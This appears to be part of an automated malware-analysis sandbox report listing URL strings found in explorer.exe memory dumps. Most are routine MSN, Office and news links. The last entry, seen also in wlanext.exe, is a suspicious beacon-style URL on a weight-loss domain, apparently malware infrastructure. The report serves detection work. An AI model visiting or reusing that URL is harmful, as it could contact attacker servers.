          Source: explorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOSZM
          Source: explorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOSp
          Source: explorer.exe, 00000003.00000000.1463778211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3092275070.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008796000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/rT
          Source: explorer.exe, 00000003.00000003.2290728057.0000000008630000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
          Source: explorer.exe, 00000003.00000003.3092275070.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
          Source: explorer.exe, 00000003.00000000.1463778211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3092275070.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008796000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/~T
          Source: explorer.exe, 00000003.00000003.3082423686.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1455360793.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3844572593.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000003.3092275070.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
          Source: explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
          Source: explorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
          Source: explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
          Source: explorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
          Source: explorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000003.2292994901.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3084837217.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3853190566.000000000899E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
          Source: explorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.stacker.com/arizona/phoenix
          Source: explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
          Source: explorer.exe, 00000003.00000002.3861185504.00000000108FF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3844546010.00000000042DF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yR
